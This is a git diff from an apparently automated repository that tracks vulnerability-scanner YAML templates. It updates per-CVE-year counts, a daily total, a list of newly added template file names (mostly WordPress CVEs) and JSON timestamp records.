diff --git a/README.md b/README.md index 10d4a91e48..a77f04db9b 100644 --- a/README.md +++ b/README.md @@ -5,233 +5,305 @@ | CVE-2001 | 2 | | CVE-2002 | 1 | | CVE-2004 | 3 | -| CVE-2005 | 6 | -| CVE-2006 | 9 | -| CVE-2007 | 16 | -| CVE-2008 | 28 | -| CVE-2009 | 23 | -| CVE-2010 | 120 | -| CVE-2011 | 26 | -| CVE-2012 | 49 | -| CVE-2013 | 45 | -| CVE-2014 | 124 | -| CVE-2015 | 139 | -| CVE-2016 | 93 | -| CVE-2017 | 173 | -| CVE-2018 | 245 | -| CVE-2019 | 246 | -| CVE-2020 | 337 | -| CVE-2021 | 704 | -| CVE-2022 | 888 | -| CVE-2023 | 1477 | -| CVE-2024 | 1899 | -| Other | 17202 | -| wordpress | 22582 | +| CVE-2005 | 4 | +| CVE-2006 | 5 | +| CVE-2007 | 12 | +| CVE-2008 | 20 | +| CVE-2009 | 19 | +| CVE-2010 | 116 | +| CVE-2011 | 20 | +| CVE-2012 | 34 | +| CVE-2013 | 29 | +| CVE-2014 | 76 | +| CVE-2015 | 87 | +| CVE-2016 | 70 | +| CVE-2017 | 136 | +| CVE-2018 | 215 | +| CVE-2019 | 207 | +| CVE-2020 | 300 | +| CVE-2021 | 528 | +| CVE-2022 | 640 | +| CVE-2023 | 962 | +| CVE-2024 | 1076 | +| Other | 15635 | +| wordpress | 26316 | ## 近几天数量变化情况 -|2024-11-15 | 2024-11-16 | 2024-11-17 | 2024-11-18 | 2024-11-19 | 2024-11-20 | 2024-11-21| +|2024-11-16 | 2024-11-17 | 2024-11-18 | 2024-11-19 | 2024-11-20 | 2024-11-21 | 2024-11-22| |--- | ------ | ------ | ------ | ------ | ------ | ---| -|45136 | 46325 | 46327 | 46326 | 46344 | 46447 | 46439| +|46325 | 46327 | 46326 | 46344 | 46447 | 46439 | 46515| ## 最近新增文件 | templates name | | --- | -| 2872997.yaml | -| 3724758381.yaml | -| 4255496606.yaml | -| 448653697.yaml | -| 2577241070.yaml | -| 4103243373.yaml | -| 2388372590.yaml | -| 2386210204.yaml | -| 3549558161.yaml | -| etouch-v2-sqli-7265.yaml | -| 2500439035.yaml | -| 886046472.yaml | -| 2408231812.yaml | -| 1353797312.yaml | -| 1037306769.yaml | -| 3187079484.yaml | -| 1201367692.yaml | -| 3245260784.yaml | -| 1083408986.yaml | -| 1423025940.yaml | -| 2524890088.yaml | -| 2058525765.yaml | -| 1403294277.yaml | -| 944781553.yaml | -| 3298730119.yaml | -| 3899704028.yaml | -| 33736904.yaml | -| 2867470386.yaml | -| 4282482219.yaml | -| 185718846.yaml | -| 3843973615.yaml | -| 803986745.yaml | -| 404669849.yaml | -| 954983152.yaml | -| 1152030829.yaml | -| 3816529230.yaml | -| 619242536.yaml | -| 1452087637.yaml | -| 3634568566.yaml | -| 835294322.yaml | -| 3391129561.yaml | -| 4173490161.yaml | -| 1938294637.yaml | -| top-xss-params-10806.yaml | -| 1262541600.yaml | -| 2461835203.yaml | -| 1186595089.yaml | -| cve-2015-9480-2632.yaml | -| cve-2021-24358-5717.yaml | -| CVE-2020-14092-4538.yaml | -| CVE-2021-24288-5678.yaml | -| cve-2014-9444-2426.yaml | -| cve-2021-25033-5788.yaml | -| cve-2011-5106-2096.yaml | -| cve-2016-1000146-2721.yaml | -| cve-2019-19985-4067.yaml | -| cve-2020-17362-4659.yaml | -| cve-2022-0656-6642.yaml | -| CVE-2016-1000134-2676.yaml | -| cve-2022-0422(1).yaml | -| cve-2021-25074-5800.yaml | -| cve-2013-4117-2263.yaml | -| cve-2016-10924-2753.yaml | -| cve-2017-17451-2983.yaml | -| cve-2016-1000128-2650.yaml | -| CVE-2021-24298-5687.yaml | -| CVE-2020-13700-4508.yaml | -| CVE-2019-9978 2.yaml | -| CVE-2016-1000130-2657.yaml | -| CVE-2021-24276-5664.yaml | -| cve-2017-17043-2975.yaml | -| CVE-2016-10940-2756.yaml | -| cve-2021-24387-5726.yaml | -| CVE-2022-1724(1).yaml | -| cve-2015-2807-2501.yaml | -| CVE-2021-24406-5734.yaml | -| cve-2021-24947-5773.yaml | -| cve-2019-9978-4332.yaml | -| CVE-2022-0149-6608.yaml | -| CVE-2013-3526-2250.yaml | -| CVE-2020-35951-5108.yaml | -| cve-2022-27849-6740.yaml | -| CVE-2022-0594(1).yaml | -| CVE-2014-8799-2412.yaml | -| cve-2019-15713-3886.yaml | -| cve-2016-10956-2760.yaml | -| cve-2011-4618-2067.yaml | -| CVE-2015-5461-2555.yaml | -| cve-2015-9414-2627.yaml | -| CVE-2017-9288-3084.yaml | -| cve-2011-4624-2076.yaml | -| CVE-2020-9043(1).yaml | -| cve-2020-24312-4805.yaml | -| cve-2013-2287-2244.yaml | -| CVE-2016-1000133-2671.yaml | -| cve-2012-0901-2137.yaml | -| CVE-2021-24275-5663.yaml | -| CVE-2017-18536-2995.yaml | -| CVE-2021-25063-5796.yaml | -| CVE-2020-12054-4461.yaml | -| cve-2020-24312-4810.yaml | -| CVE-2011-5107-2098.yaml | -| CVE-2013-6281-2281.yaml | -| cve-2018-7422-3594.yaml | -| cve-2011-5179-2111.yaml | -| CVE-2018-9118-3651.yaml | -| CVE-2021-24987-5777.yaml | -| cve-2020-11738-4426.yaml | -| CVE-2022-1598-6653.yaml | -| CVE-2021-24340-5706.yaml | -| CVE-2021-24335-5705.yaml | -| cve-2021-24146-5625.yaml | -| cve-2021-25111-5803.yaml | -| cve-2014-4544-2362.yaml | -| cve-2021-24495-5749.yaml | -| cve-2016-1000138-2697.yaml | -| cve-2021-24997-5782.yaml | -| CVE-2020-12800-4486.yaml | -| cve-2014-4513-2344.yaml | -| CVE-2021-34621-6233.yaml | -| cve-2021-24991-5779.yaml | -| CVE-2019-6112-4177.yaml | -| cve-2016-1000143-2715.yaml | -| cve-2017-1000170-2842.yaml | -| CVE-2021-24407-5740.yaml | -| CVE-2021-24389-5727.yaml | -| cve-2017-5487-3023.yaml | -| CVE-2021-24285-5674.yaml | -| CVE-2015-4694-2546.yaml | -| cve-2014-4535-2347.yaml | -| cve-2015-1000012-2458.yaml | -| cve-2022-0599(1).yaml | -| cve-2011-4926-2092.yaml | -| cve-2022-1119-6648.yaml | -| CVE-2020-25213-4860.yaml | -| cve-2021-24342-5715.yaml | -| CVE-2016-10960-2766.yaml | -| CVE-2011-1669-2044.yaml | -| CVE-2016-10033-2747.yaml | -| CVE-2022-0208(1).yaml | -| CVE-2022-1906(1).yaml | -| CVE-2016-1000140-2705.yaml | -| CVE-2016-1000137-2693.yaml | -| cve-2021-39327-6340.yaml | -| CVE-2012-5913-2223.yaml | -| CVE-2016-1000131-2664.yaml | -| CVE-2021-24762-5765.yaml | -| CVE-2019-11869-3763.yaml | -| CVE-2021-34640-6236.yaml | -| cve-2011-5265-2120.yaml | -| CVE-2016-1000148-2722.yaml | -| cve-2021-24316-5694.yaml | -| CVE-2018-20462-3492.yaml | -| cve-2012-2371-2174.yaml | -| cve-2019-15889-3905.yaml | -| cve-2021-39322-6337.yaml | -| CVE-2021-24176-5632.yaml | -| CVE-2020-24186-4795.yaml | -| cve-2022-0288(1).yaml | -| cve-2021-24838-5767.yaml | -| CVE-2022-29455(1).yaml | -| CVE-2016-1000135-2683.yaml | -| CVE-2012-0896-2133.yaml | -| CVE-2018-7422-3596.yaml | -| cve-2021-24746-5760.yaml | -| cve-2022-0591-6636.yaml | -| cve-2020-26153-4913.yaml | -| CVE-2012-1835-2168.yaml | -| cve-2021-24237-5656.yaml | -| CVE-2020-28976-4989.yaml | -| cve-2018-3810-3557.yaml | -| cve-2022-0148-6605.yaml | -| CVE-2021-25055-5793.yaml | -| cve-2020-35951-5110.yaml | -| cve-2021-24910(1).yaml | -| CVE-2017-18598-2996.yaml | -| cve-2021-39350-6345.yaml | -| cve-2020-24148-4789.yaml | -| cve-2020-35234-5025.yaml | -| CVE-2024-25600_interactsh.yaml | -| CVE-2018-11709-3199.yaml | -| cve-2019-19985-4060.yaml | -| cve-2022-0653-6638.yaml | -| CVE-2021-25052-5789.yaml | -| CVE-2022-0140(1).yaml | -| CVE-2022-0346-6622.yaml | -| cve-2017-17059-2978.yaml | -| CVE-2019-16931-3963.yaml | -| CVE-2021-24236(1).yaml | -| cve-2018-16283-3362.yaml | -| CVE-2018-16299-3374.yaml | -| cve-2014-4539-2358.yaml | -| CVE-2022-1937(1).yaml | -| cve-2012-4768-2207.yaml | -| CVE-2016-1000129-2654.yaml | -| cve-2015-4414-2531.yaml | -| cve-2021-24210-5640.yaml | -| CVE-2021-24498-5755.yaml | -| CVE-2014-4940-2382.yaml | -| CVE-2011-5181-2117.yaml | -| cve-2014-4558-2371.yaml | +| 807515113.yaml | +| 2570525576.yaml | +| 1897115000.yaml | +| 3020537829.yaml | +| 840401525.yaml | +| 2989783729.yaml | +| 316786365.yaml | +| 4088014974.yaml | +| 4240453538.yaml | +| 959515023.yaml | +| 487597526.yaml | +| 187571951.yaml | +| 2376867242.yaml | +| 1283250060.yaml | +| 2230685271.yaml | +| 2623190658.yaml | +| Swagger.yaml | +| 1626980635.yaml | +| 61830093.yaml | +| 2167015698.yaml | +| 4085581949.yaml | +| 4142363606.yaml | +| 3170504396.yaml | +| 3841393894.yaml | +| 1765842777.yaml | +| 515297371.yaml | +| 453789592.yaml | +| 2667740598.yaml | +| 3334421219.yaml | +| 585108827.yaml | +| 1540122430.yaml | +| 2027083354.yaml | +| 533176455.yaml | +| 1366422686.yaml | +| 559671807.yaml | +| 3155115679.yaml | +| 2866839075.yaml | +| 90969961.yaml | +| 3963267632.yaml | +| 4147439962.yaml | +| 636129119.yaml | +| 2751898212.yaml | +| 124984706.yaml | +| 2858598636.yaml | +| 1915143880.yaml | +| cve-2021-39316-6330.yaml | +| CVE-2012-4768-2207.yaml | +| CVE-2024-9111.yaml | +| CVE-2024-11365.yaml | +| cve-2019-15858-3891.yaml | +| CVE-2015-1000012-2462.yaml | +| CVE-2024-11388.yaml | +| cve-2020-35489-5045.yaml | +| CVE-2024-10682.yaml | +| CVE-2021-24235-5652.yaml | +| include-mastodon-feed.yaml | +| CVE-2019-19134-4032.yaml | +| CVE-2021-24987-5776.yaml | +| CVE-2011-4926-2087.yaml | +| cve-2022-1904(1).yaml | +| cve-2021-24498-5754.yaml | +| CVE-2022-0149-6607.yaml | +| CVE-2017-5487-3023.yaml | +| forumengine.yaml | +| cve-2016-10033-2745.yaml | +| CVE-2022-0422(1).yaml | +| CVE-2021-25075(1).yaml | +| cve-2020-24312-4806.yaml | +| CVE-2021-24762-5766.yaml | +| CVE-2019-14205-3822.yaml | +| cve-2017-17043-2977.yaml | +| CVE-2015-5471-2557.yaml | +| CVE-2024-11412.yaml | +| CVE-2022-27849-6741.yaml | +| CVE-2020-11738-4428.yaml | +| CVE-2014-4513-2341.yaml | +| CVE-2024-11409.yaml | +| CVE-2016-1000134-2678.yaml | +| cve-2020-24186-4793.yaml | +| CVE-2021-25028-5784.yaml | +| ultimate-youtube-video-player.yaml | +| CVE-2011-4618-2071.yaml | +| friendly-functions-for-welcart.yaml | +| cve-2018-20462-3494.yaml | +| CVE-2024-10675.yaml | +| cve-2016-10956-2762.yaml | +| pure-css-circle-progress-bar.yaml | +| CVE-2024-11438.yaml | +| CVE-2011-5265-2119.yaml | +| CVE-2020-11738-4425.yaml | +| CVE-2018-5316-3568.yaml | +| cve-2018-9118-3654.yaml | +| CVE-2012-5913-2226.yaml | +| cve-2019-16931-3963.yaml | +| cve-2020-14092-4538.yaml | +| cve-2011-5179-2105.yaml | +| cve-2021-24300(1).yaml | +| CVE-2021-24510-5759.yaml | +| CVE-2019-6112-4173.yaml | +| CVE-2021-24146-5629.yaml | +| CVE-2024-11435.yaml | +| stream-status-for-twitch.yaml | +| CVE-2024-9442.yaml | +| CVE-2020-26876-4926.yaml | +| cve-2014-4539-2355.yaml | +| cve-2016-1000153-2736.yaml | +| cve-2021-25120-5806.yaml | +| recipepress-reloaded.yaml | +| CVE-2024-10796.yaml | +| CVE-2022-0595(1).yaml | +| CVE-2024-11370.yaml | +| CVE-2021-24342-5713.yaml | +| cve-2021-24288-5678.yaml | +| CVE-2024-11354.yaml | +| cve-2018-3810-3558.yaml | +| page-parts.yaml | +| CVE-2021-24278-5669.yaml | +| CVE-2024-11334.yaml | +| CVE-2024-10726.yaml | +| CVE-2022-0218-6615.yaml | +| CVE-2024-11432.yaml | +| CVE-2020-35951-5106.yaml | +| CVE-2021-24997-5782.yaml | +| cve-2021-24226-5645.yaml | +| CVE-2015-4694-2542.yaml | +| cve-2021-24891(1).yaml | +| button-block.yaml | +| CVE-2022-0189-6611.yaml | +| CVE-2017-17451-2981.yaml | +| grey-owl-lightbox.yaml | +| CVE-2019-9978-4326.yaml | +| CVE-2024-10164.yaml | +| my-contador-wp.yaml | +| CVE-2021-25111-5803.yaml | +| CVE-2024-11197.yaml | +| cve-2019-15858-3892.yaml | +| CVE-2021-24364-5721.yaml | +| cve-2020-28976-4990.yaml | +| CVE-2024-11456.yaml | +| CVE-2020-17362-4659.yaml | +| cve-2016-1000137-2693.yaml | +| CVE-2011-4624-2080.yaml | +| CVE-2024-11416.yaml | +| cve-2021-24358-5716.yaml | +| CVE-2024-9542.yaml | +| cve-2020-11930-4444.yaml | +| cve-2019-20210(1).yaml | +| CVE-2021-39322-6339.yaml | +| CVE-2022-0591-6637.yaml | +| CVE-2024-11447.yaml | +| CVE-2024-10172.yaml | +| CVE-2024-10782.yaml | +| CVE-2022-0271-6616.yaml | +| CVE-2016-1000135-2685.yaml | +| subaccounts-for-woocommerce.yaml | +| cve-2014-9094-2416.yaml | +| CVE-2024-9851.yaml | +| suevafree-essential-kit.yaml | +| shine-pdf.yaml | +| CVE-2024-10528.yaml | +| CVE-2024-11440.yaml | +| CVE-2012-2371-2175.yaml | +| cve-2019-6715-4190.yaml | +| cve-2021-25074-5799.yaml | +| CVE-2024-10532.yaml | +| theme-builder-for-elementor.yaml | +| salavat-counter.yaml | +| cf7-email-add-on.yaml | +| CVE-2022-1597-6652.yaml | +| grid-view-gallery.yaml | +| cve-2021-24316-5689.yaml | +| cve-2021-25052-5790.yaml | +| CVE-2011-5106-2093.yaml | +| CVE-2014-4544-2360.yaml | +| CVE-2020-26153-4913.yaml | +| CVE-2012-0896-2132.yaml | +| cve-2021-24838-5770.yaml | +| cve-2016-1000141-2710.yaml | +| CVE-2024-10623.yaml | +| cve-2013-4117-2265.yaml | +| cve-2018-8719-3640.yaml | +| CVE-2024-10890.yaml | +| CVE-2024-10788.yaml | +| cve-2017-18536-2993.yaml | +| CVE-2014-8799-2411.yaml | +| CVE-2024-10522.yaml | +| cve-2021-24499-5756.yaml | +| CVE-2024-10792.yaml | +| CVE-2021-24495-5747.yaml | +| cve-2021-34643-6238.yaml | +| CVE-2019-14470-3851.yaml | +| CVE-2024-10316.yaml | +| CVE-2024-11385.yaml | +| CVE-2024-11428.yaml | +| wip-incoming-lite.yaml | +| CVE-2012-4273-2197.yaml | +| CVE-2024-11089.yaml | +| cve-2011-5107-2102.yaml | +| tour-operator.yaml | +| CVE-2021-21389-5509.yaml | +| CVE-2022-0148-6604.yaml | +| cve-2013-2287-2247.yaml | +| CVE-2016-1000128-2651.yaml | +| cve-2021-24947-5774.yaml | +| CVE-2024-11424.yaml | +| cve-2019-16525-3937.yaml | +| cve-2016-1000136-2689.yaml | +| CVE-2024-10393.yaml | +| cve-2015-5461-2555.yaml | +| CVE-2013-3526-2252.yaml | +| CVE-2024-11455.yaml | +| cve-2021-24472-5744.yaml | +| cve-2019-16932(1).yaml | +| void-visual-whmcs-element.yaml | +| slick-sitemap.yaml | +| cve-2021-24335-5701.yaml | +| cve-2016-1000143-2717.yaml | +| CVE-2014-9444-2423.yaml | +| cve-2014-4550-2364.yaml | +| CVE-2024-11414.yaml | +| cve-2014-4536-2350.yaml | +| cve-2014-4940-2381.yaml | +| CVE-2024-10785.yaml | +| CVE-2014-5368-2397.yaml | +| CVE-2015-4414-2527.yaml | +| CVE-2022-0952(1).yaml | +| CVE-2021-24176-5634.yaml | +| bard-extra.yaml | +| cve-2021-24991-5778.yaml | +| CVE-2012-0901-2138.yaml | +| cve-2020-12054-4458.yaml | +| dino-game.yaml | +| CVE-2021-24146-5630.yaml | +| cve-2019-15889-3904.yaml | +| cve-2016-10033-2749.yaml | +| lazy-load-videos-and-sticky-control.yaml | +| CVE-2024-10400.yaml | +| CVE-2022-0288(1).yaml | +| cve-2021-24406-5732.yaml | +| CVE-2024-10671.yaml | +| CVE-2011-5181-2116.yaml | +| cve-2016-1000131-2664.yaml | +| CVE-2024-11371.yaml | +| cve-2021-24340-5709.yaml | +| CVE-2024-10177.yaml | +| cve-2014-4561-2372.yaml | +| CVE-2013-4625-2270.yaml | +| CVE-2022-0653-6639.yaml | +| cve-2015-2807-2497.yaml | +| CVE-2024-10696.yaml | +| cve-2020-35749-5073.yaml | +| CVE-2024-11360.yaml | +| cve-2020-12800-4486.yaml | +| cve-2022-0201(1).yaml | +| CVE-2024-11088.yaml | +| CVE-2018-3810-3555.yaml | +| cve-2021-39312-6327.yaml | +| CVE-2017-18598-2997.yaml | +| cve-2020-13700-4513.yaml | +| CVE-2021-24298-5686.yaml | +| CVE-2021-24316-5692.yaml | +| cve-2021-24389-5727.yaml | +| security-force.yaml | +| cve-2016-1000129-2654.yaml | +| CVE-2014-4558-2369.yaml | +| CVE-2021-24284(1).yaml | +| CVE-2016-1000130-2659.yaml | +| CVE-2016-1000154-2740.yaml | +| CVE-2024-9371.yaml | +| CVE-2021-24274-5658.yaml | +| CVE-2024-10898.yaml | +| CVE-2016-1000127-2644.yaml | +| CVE-2021-39320-6336.yaml | diff --git a/data.json b/data.json index 8cef436d0c..f1c7057709 100644 --- a/data.json +++ b/data.json @@ -257,5 +257,6 @@ "2024-11-18": 46326, "2024-11-19": 46344, "2024-11-20": 46447, - "2024-11-21": 46439 + "2024-11-21": 46439, + "2024-11-22": 46515 } \ No newline at end of file diff --git a/data1.json b/data1.json index 16ce16f440..a32c3840e1 100644 --- a/data1.json +++ b/data1.json @@ -55571,5 +55571,278 @@ "CVE-2021-24498-5755.yaml": "2024-11-21 02:34:48", "CVE-2014-4940-2382.yaml": "2024-11-21 02:34:48", "CVE-2011-5181-2117.yaml": "2024-11-21 02:34:48", - "cve-2014-4558-2371.yaml": "2024-11-21 02:34:48" + "cve-2014-4558-2371.yaml": "2024-11-21 02:34:48", + "807515113.yaml": "2024-11-22 02:35:15", + "2570525576.yaml": "2024-11-22 02:35:15", + "1897115000.yaml": "2024-11-22 02:35:15", + "3020537829.yaml": "2024-11-22 02:35:15", + "840401525.yaml": "2024-11-22 02:35:15", + "2989783729.yaml": "2024-11-22 02:35:15", + "316786365.yaml": "2024-11-22 02:35:15", + "4088014974.yaml": "2024-11-22 02:35:15", + "4240453538.yaml": "2024-11-22 02:35:15", + "959515023.yaml": "2024-11-22 02:35:15", + "487597526.yaml": "2024-11-22 02:35:15", + "187571951.yaml": "2024-11-22 02:35:15", + "2376867242.yaml": "2024-11-22 02:35:15", + "1283250060.yaml": "2024-11-22 02:35:15", + "2230685271.yaml": "2024-11-22 02:35:15", + "2623190658.yaml": "2024-11-22 02:35:15", + "Swagger.yaml": "2024-11-22 02:35:15", + "1626980635.yaml": "2024-11-22 02:35:15", + "61830093.yaml": "2024-11-22 02:35:15", + "2167015698.yaml": "2024-11-22 02:35:15", + "4085581949.yaml": "2024-11-22 02:35:15", + "4142363606.yaml": "2024-11-22 02:35:15", + "3170504396.yaml": "2024-11-22 02:35:15", + "3841393894.yaml": "2024-11-22 02:35:15", + "1765842777.yaml": "2024-11-22 02:35:15", + "515297371.yaml": "2024-11-22 02:35:15", + "453789592.yaml": "2024-11-22 02:35:15", + "2667740598.yaml": "2024-11-22 02:35:15", + "3334421219.yaml": "2024-11-22 02:35:15", + "585108827.yaml": "2024-11-22 02:35:15", + "1540122430.yaml": "2024-11-22 02:35:15", + "2027083354.yaml": "2024-11-22 02:35:15", + "533176455.yaml": "2024-11-22 02:35:15", + "1366422686.yaml": "2024-11-22 02:35:15", + "559671807.yaml": "2024-11-22 02:35:15", + "3155115679.yaml": "2024-11-22 02:35:15", + "2866839075.yaml": "2024-11-22 02:35:15", + "90969961.yaml": "2024-11-22 02:35:15", + "3963267632.yaml": "2024-11-22 02:35:15", + "4147439962.yaml": "2024-11-22 02:35:15", + "636129119.yaml": "2024-11-22 02:35:15", + "2751898212.yaml": "2024-11-22 02:35:15", + "124984706.yaml": "2024-11-22 02:35:15", + "2858598636.yaml": "2024-11-22 02:35:15", + "1915143880.yaml": "2024-11-22 02:35:15", + "cve-2021-39316-6330.yaml": "2024-11-22 02:35:15", + "CVE-2012-4768-2207.yaml": "2024-11-22 02:35:15", + "CVE-2024-9111.yaml": "2024-11-22 02:35:15", + "CVE-2024-11365.yaml": "2024-11-22 02:35:15", + "cve-2019-15858-3891.yaml": "2024-11-22 02:35:15", + "CVE-2015-1000012-2462.yaml": "2024-11-22 02:35:15", + "CVE-2024-11388.yaml": "2024-11-22 02:35:15", + "cve-2020-35489-5045.yaml": "2024-11-22 02:35:15", + "CVE-2024-10682.yaml": "2024-11-22 02:35:15", + "CVE-2021-24235-5652.yaml": "2024-11-22 02:35:15", + "include-mastodon-feed.yaml": "2024-11-22 02:35:15", + "CVE-2019-19134-4032.yaml": "2024-11-22 02:35:15", + "CVE-2021-24987-5776.yaml": "2024-11-22 02:35:15", + "CVE-2011-4926-2087.yaml": "2024-11-22 02:35:15", + "cve-2022-1904(1).yaml": "2024-11-22 02:35:15", + "cve-2021-24498-5754.yaml": "2024-11-22 02:35:15", + "CVE-2022-0149-6607.yaml": "2024-11-22 02:35:15", + "CVE-2017-5487-3023.yaml": "2024-11-22 02:35:15", + "forumengine.yaml": "2024-11-22 02:35:15", + "cve-2016-10033-2745.yaml": "2024-11-22 02:35:15", + "CVE-2022-0422(1).yaml": "2024-11-22 02:35:15", + "CVE-2021-25075(1).yaml": "2024-11-22 02:35:15", + "cve-2020-24312-4806.yaml": "2024-11-22 02:35:15", + "CVE-2021-24762-5766.yaml": "2024-11-22 02:35:15", + "CVE-2019-14205-3822.yaml": "2024-11-22 02:35:15", + "cve-2017-17043-2977.yaml": "2024-11-22 02:35:15", + "CVE-2015-5471-2557.yaml": "2024-11-22 02:35:15", + "CVE-2024-11412.yaml": "2024-11-22 02:35:15", + "CVE-2022-27849-6741.yaml": "2024-11-22 02:35:15", + "CVE-2020-11738-4428.yaml": "2024-11-22 02:35:15", + "CVE-2014-4513-2341.yaml": "2024-11-22 02:35:15", + "CVE-2024-11409.yaml": "2024-11-22 02:35:15", + "CVE-2016-1000134-2678.yaml": "2024-11-22 02:35:15", + "cve-2020-24186-4793.yaml": "2024-11-22 02:35:15", + "CVE-2021-25028-5784.yaml": "2024-11-22 02:35:15", + "ultimate-youtube-video-player.yaml": "2024-11-22 02:35:15", + "CVE-2011-4618-2071.yaml": "2024-11-22 02:35:15", + "friendly-functions-for-welcart.yaml": "2024-11-22 02:35:15", + "cve-2018-20462-3494.yaml": "2024-11-22 02:35:15", + "CVE-2024-10675.yaml": "2024-11-22 02:35:15", + "cve-2016-10956-2762.yaml": "2024-11-22 02:35:15", + "pure-css-circle-progress-bar.yaml": "2024-11-22 02:35:15", + "CVE-2024-11438.yaml": "2024-11-22 02:35:15", + "CVE-2011-5265-2119.yaml": "2024-11-22 02:35:15", + "CVE-2020-11738-4425.yaml": "2024-11-22 02:35:15", + "CVE-2018-5316-3568.yaml": "2024-11-22 02:35:15", + "cve-2018-9118-3654.yaml": "2024-11-22 02:35:15", + "CVE-2012-5913-2226.yaml": "2024-11-22 02:35:15", + "cve-2019-16931-3963.yaml": "2024-11-22 02:35:15", + "cve-2020-14092-4538.yaml": "2024-11-22 02:35:15", + "cve-2011-5179-2105.yaml": "2024-11-22 02:35:15", + "cve-2021-24300(1).yaml": "2024-11-22 02:35:15", + "CVE-2021-24510-5759.yaml": "2024-11-22 02:35:15", + "CVE-2019-6112-4173.yaml": "2024-11-22 02:35:15", + "CVE-2021-24146-5629.yaml": "2024-11-22 02:35:15", + "CVE-2024-11435.yaml": "2024-11-22 02:35:15", + "stream-status-for-twitch.yaml": "2024-11-22 02:35:15", + "CVE-2024-9442.yaml": "2024-11-22 02:35:15", + "CVE-2020-26876-4926.yaml": "2024-11-22 02:35:15", + "cve-2014-4539-2355.yaml": "2024-11-22 02:35:15", + "cve-2016-1000153-2736.yaml": "2024-11-22 02:35:15", + "cve-2021-25120-5806.yaml": "2024-11-22 02:35:15", + "recipepress-reloaded.yaml": "2024-11-22 02:35:15", + "CVE-2024-10796.yaml": "2024-11-22 02:35:15", + "CVE-2022-0595(1).yaml": "2024-11-22 02:35:15", + "CVE-2024-11370.yaml": "2024-11-22 02:35:15", + "CVE-2021-24342-5713.yaml": "2024-11-22 02:35:15", + "cve-2021-24288-5678.yaml": "2024-11-22 02:35:15", + "CVE-2024-11354.yaml": "2024-11-22 02:35:15", + "cve-2018-3810-3558.yaml": "2024-11-22 02:35:15", + "page-parts.yaml": "2024-11-22 02:35:15", + "CVE-2021-24278-5669.yaml": "2024-11-22 02:35:15", + "CVE-2024-11334.yaml": "2024-11-22 02:35:15", + "CVE-2024-10726.yaml": "2024-11-22 02:35:15", + "CVE-2022-0218-6615.yaml": "2024-11-22 02:35:15", + "CVE-2024-11432.yaml": "2024-11-22 02:35:15", + "CVE-2020-35951-5106.yaml": "2024-11-22 02:35:15", + "CVE-2021-24997-5782.yaml": "2024-11-22 02:35:15", + "cve-2021-24226-5645.yaml": "2024-11-22 02:35:15", + "CVE-2015-4694-2542.yaml": "2024-11-22 02:35:15", + "cve-2021-24891(1).yaml": "2024-11-22 02:35:15", + "button-block.yaml": "2024-11-22 02:35:15", + "CVE-2022-0189-6611.yaml": "2024-11-22 02:35:15", + "CVE-2017-17451-2981.yaml": "2024-11-22 02:35:15", + "grey-owl-lightbox.yaml": "2024-11-22 02:35:15", + "CVE-2019-9978-4326.yaml": "2024-11-22 02:35:15", + "CVE-2024-10164.yaml": "2024-11-22 02:35:15", + "my-contador-wp.yaml": "2024-11-22 02:35:15", + "CVE-2021-25111-5803.yaml": "2024-11-22 02:35:15", + "CVE-2024-11197.yaml": "2024-11-22 02:35:15", + "cve-2019-15858-3892.yaml": "2024-11-22 02:35:15", + "CVE-2021-24364-5721.yaml": "2024-11-22 02:35:15", + "cve-2020-28976-4990.yaml": "2024-11-22 02:35:15", + "CVE-2024-11456.yaml": "2024-11-22 02:35:15", + "CVE-2020-17362-4659.yaml": "2024-11-22 02:35:15", + "cve-2016-1000137-2693.yaml": "2024-11-22 02:35:15", + "CVE-2011-4624-2080.yaml": "2024-11-22 02:35:15", + "CVE-2024-11416.yaml": "2024-11-22 02:35:15", + "cve-2021-24358-5716.yaml": "2024-11-22 02:35:15", + "CVE-2024-9542.yaml": "2024-11-22 02:35:15", + "cve-2020-11930-4444.yaml": "2024-11-22 02:35:15", + "cve-2019-20210(1).yaml": "2024-11-22 02:35:15", + "CVE-2021-39322-6339.yaml": "2024-11-22 02:35:15", + "CVE-2022-0591-6637.yaml": "2024-11-22 02:35:15", + "CVE-2024-11447.yaml": "2024-11-22 02:35:15", + "CVE-2024-10172.yaml": "2024-11-22 02:35:15", + "CVE-2024-10782.yaml": "2024-11-22 02:35:15", + "CVE-2022-0271-6616.yaml": "2024-11-22 02:35:15", + "CVE-2016-1000135-2685.yaml": "2024-11-22 02:35:15", + "subaccounts-for-woocommerce.yaml": "2024-11-22 02:35:15", + "cve-2014-9094-2416.yaml": "2024-11-22 02:35:15", + "CVE-2024-9851.yaml": "2024-11-22 02:35:15", + "suevafree-essential-kit.yaml": "2024-11-22 02:35:15", + "shine-pdf.yaml": "2024-11-22 02:35:15", + "CVE-2024-10528.yaml": "2024-11-22 02:35:15", + "CVE-2024-11440.yaml": "2024-11-22 02:35:15", + "CVE-2012-2371-2175.yaml": "2024-11-22 02:35:15", + "cve-2019-6715-4190.yaml": "2024-11-22 02:35:15", + "cve-2021-25074-5799.yaml": "2024-11-22 02:35:15", + "CVE-2024-10532.yaml": "2024-11-22 02:35:15", + "theme-builder-for-elementor.yaml": "2024-11-22 02:35:15", + "salavat-counter.yaml": "2024-11-22 02:35:15", + "cf7-email-add-on.yaml": "2024-11-22 02:35:15", + "CVE-2022-1597-6652.yaml": "2024-11-22 02:35:15", + "grid-view-gallery.yaml": "2024-11-22 02:35:15", + "cve-2021-24316-5689.yaml": "2024-11-22 02:35:15", + "cve-2021-25052-5790.yaml": "2024-11-22 02:35:15", + "CVE-2011-5106-2093.yaml": "2024-11-22 02:35:15", + "CVE-2014-4544-2360.yaml": "2024-11-22 02:35:15", + "CVE-2020-26153-4913.yaml": "2024-11-22 02:35:15", + "CVE-2012-0896-2132.yaml": "2024-11-22 02:35:15", + "cve-2021-24838-5770.yaml": "2024-11-22 02:35:15", + "cve-2016-1000141-2710.yaml": "2024-11-22 02:35:15", + "CVE-2024-10623.yaml": "2024-11-22 02:35:15", + "cve-2013-4117-2265.yaml": "2024-11-22 02:35:15", + "cve-2018-8719-3640.yaml": "2024-11-22 02:35:15", + "CVE-2024-10890.yaml": "2024-11-22 02:35:15", + "CVE-2024-10788.yaml": "2024-11-22 02:35:15", + "cve-2017-18536-2993.yaml": "2024-11-22 02:35:15", + "CVE-2014-8799-2411.yaml": "2024-11-22 02:35:15", + "CVE-2024-10522.yaml": "2024-11-22 02:35:15", + "cve-2021-24499-5756.yaml": "2024-11-22 02:35:15", + "CVE-2024-10792.yaml": "2024-11-22 02:35:15", + "CVE-2021-24495-5747.yaml": "2024-11-22 02:35:15", + "cve-2021-34643-6238.yaml": "2024-11-22 02:35:15", + 